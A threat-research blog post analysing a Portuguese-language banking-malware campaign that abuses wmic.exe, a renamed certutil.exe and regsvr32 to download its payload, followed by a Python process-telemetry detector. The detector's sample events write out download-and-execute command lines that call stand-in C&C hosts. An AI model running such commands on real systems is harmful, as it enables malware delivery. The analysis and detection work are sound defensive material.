by Byron Gelera and Donald Castillo
We recently found a malware that abuses two legitimate Windows files — the command line utility wmic.exe and certutil.exe, a program that manages certificates for Windows — to download its payload onto the victim’s device. What’s notable about these files is that downloading other files is part of their normal set of features, which makes them susceptible to abuse for malicious purposes.
Although WMIC and CertUtil have been used in malware campaigns before, this attack integrates both files into its routine and adds even more evasion layers. This indicates that the cybercriminals behind this attack are evolving their tools and techniques for greater stealth and effectiveness.
Figure 1: Infection Chain for the attack
Analysis of the routine
The attack starts with a malicious email, seemingly from the company that operates the national postal service of Brazil, notifying the target recipient of an unsuccessful delivery attempt. It then mentions that the details (including the tracking code) of the delivery can be accessed via an embedded link.
Figure 2: The email containing the malicious link
Once the recipient clicks the embedded link, a browser window opens and prompts the user to download a ZIP file. Once the ZIP file is downloaded and extracted, the user is presented with an LNK file (detected as Trojan.LNK.DLOADR.AUSUJM). The LNK file points to cmd.exe using the following parameter:
The cmd.exe is responsible for executing wmic.exe via the following parameter:
Doing this allows wmic.exe to download and execute script commands from a Command-and-Control (C&C) server. The script creates a copy of certutil.exe in the %temp% folder under a different name: certis.exe. This step in the routine is most likely performed as an additional evasion technique since, as mentioned earlier, the use of certutil.exe in malicious attacks is already publicly known.
The next step in the routine involves a script that will command certis.exe to download files from a new set of C&C servers, which are received from the first download URL.
One of the downloaded files is the main payload — a DLL file (detected as TSPY_GUILDMA.C) that is executed using regsvr32.exe. The other files downloaded from the C&C server are used as modules for the main payload’s routine.
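The chain described above (cmd.exe launched from the LNK, wmic.exe pulling a remote script, certutil.exe copied to %temp% under another name and used as a downloader, regsvr32.exe loading a DLL from %temp%) is visible in process-creation telemetry. The following detector is an added example and is not code from Trend Micro or from the original post. It assumes Sysmon-style process-creation fields (image path, parent PID, command line and the PE OriginalFileName), and every event, URL and path in `SAMPLE_EVENTS` is constructed for illustration, not taken from the campaign:

```python
"""Flag the WMIC / renamed-CertUtil / regsvr32 download chain in process events.

Added example (not from the original post). Field names follow Sysmon
Event ID 1 conventions; sample events, hosts and paths are constructed.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
TEMP_RE = re.compile(r"\\Temp\\", re.IGNORECASE)


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str           # path of the executable that was started
    original_name: str   # PE OriginalFileName (survives a rename on disk)
    cmdline: str


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def classify(ev: ProcEvent) -> List[str]:
    """Return the suspicious behaviours a single event exhibits."""
    hits = []
    name = basename(ev.image)
    has_url = bool(URL_RE.search(ev.cmdline))
    # wmic.exe given a URL: consistent with fetching remote script commands.
    if name == "wmic.exe" and has_url:
        hits.append("wmic_remote_script")
    # OriginalFileName says CertUtil, but the file on disk is renamed or
    # sits in a Temp folder: the certis.exe trick described in the post.
    if ev.original_name.lower() == "certutil.exe":
        if name != "certutil.exe" or TEMP_RE.search(ev.image):
            hits.append("renamed_certutil")
        if has_url:
            hits.append("certutil_download")
    # regsvr32.exe registering a DLL that lives under a Temp folder.
    if name == "regsvr32.exe" and TEMP_RE.search(ev.cmdline):
        hits.append("regsvr32_temp_dll")
    return hits


def ancestors(ev: ProcEvent, by_pid: Dict[int, ProcEvent]) -> List[str]:
    """Walk parent PIDs upward and return the ancestor image names."""
    chain, cur = [], by_pid.get(ev.ppid)
    while cur is not None and len(chain) < 16:
        chain.append(basename(cur.image))
        cur = by_pid.get(cur.ppid)
    return chain


def detect_chain(events: List[ProcEvent]) -> Tuple[List[dict], bool]:
    """Score every event; report whether the full chain is present."""
    by_pid = {e.pid: e for e in events}
    findings = [
        {"pid": e.pid, "tag": tag, "ancestry": ancestors(e, by_pid)}
        for e in events
        for tag in classify(e)
    ]
    tags = {f["tag"] for f in findings}
    required = {"wmic_remote_script", "renamed_certutil",
                "certutil_download", "regsvr32_temp_dll"}
    wmic_from_cmd = any("cmd.exe" in f["ancestry"]
                        for f in findings if f["tag"] == "wmic_remote_script")
    return findings, required <= tags and wmic_from_cmd


# Constructed sample telemetry (hypothetical hosts under .invalid).
TMP = r"C:\Users\user\AppData\Local\Temp"
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "EXPLORER.EXE", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Windows\System32\cmd.exe", "Cmd.Exe",
              "cmd.exe /c wmic.exe http://c2-one.invalid/stage1"),
    ProcEvent(300, 200, r"C:\Windows\System32\wbem\wmic.exe", "wmic.exe",
              "wmic.exe http://c2-one.invalid/stage1"),
    ProcEvent(400, 300, TMP + r"\certis.exe", "CertUtil.exe",
              "certis.exe http://c2-two.invalid/main.bin " + TMP + r"\main.bin"),
    ProcEvent(500, 300, r"C:\Windows\System32\regsvr32.exe", "REGSVR32.EXE",
              "regsvr32.exe /s " + TMP + r"\main.dll"),
    # Benign look-alikes that must not fire.
    ProcEvent(600, 100, r"C:\Windows\System32\certutil.exe", "CertUtil.exe",
              r"certutil.exe -dump C:\certs\ca.cer"),
    ProcEvent(700, 100, r"C:\Windows\System32\regsvr32.exe", "REGSVR32.EXE",
              r"regsvr32.exe /s C:\Program Files\Vendor\comp.dll"),
]

if __name__ == "__main__":
    found, full = detect_chain(SAMPLE_EVENTS)
    for f in found:
        print(f"pid {f['pid']}: {f['tag']} (parents: {' <- '.join(f['ancestry'])})")
    print("full chain observed:", full)
```

The OriginalFileName check is the part worth keeping: renaming certutil.exe to certis.exe changes the path but not the PE resource, so the comparison still ties the Temp-folder copy back to CertUtil. The ancestry walk adds the cmd.exe-to-wmic.exe lineage the post describes, which separates this pattern from an administrator running wmic interactively.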
Our analysis of the payload shows that it is a banking malware that only works when the target’s language is set to Portuguese, which means it’s likely designed to target users in Portugal and/or Brazil, which are both Portuguese-speaking countries.
Best practices to defend against this attack
The use of legitimate files to add evasion layers is a common tactic of cybercriminals, and it poses problems for security solutions that struggle to distinguish legitimate use from malicious use.
However, users can prevent this attack from moving past its initial stage by implementing best practices for email security. This includes:
Trend Micro Solutions
Enterprises can take advantage of Trend Micro endpoint solutions such as Trend Micro Smart Protection Suites and Worry-Free Business Security. Both solutions protect users and businesses from threats by detecting malicious files and spammed messages, and block all related malicious URLs. Trend Micro Deep Discovery has a layer for email inspection that can protect enterprises by detecting malicious attachments and URLs. Deep Discovery can detect the remote scripts even if they are not downloaded to the physical endpoint.
Trend Micro Hosted Email Security is a no-maintenance cloud solution that delivers continuously updated protection to stop spam, malware, spear phishing, ransomware, and advanced targeted attacks before they reach the network. Additionally, Trend Micro Anti-Spam Engine detects and blocks malicious IQY files without using signatures. Trend Micro Email Reputation Services detects the spam mail used by this threat upon arrival.
Trend Micro OfficeScan with XGen endpoint security infuses high-fidelity machine learning with other detection technologies and global threat intelligence for comprehensive protection against advanced malware.
Indicators of Compromise (IoCs)
Detected as Trojan.LNK.DLOADR.AUSUJM (LNK file)
Detected as TSPY_GUILDMA.C (DLL file)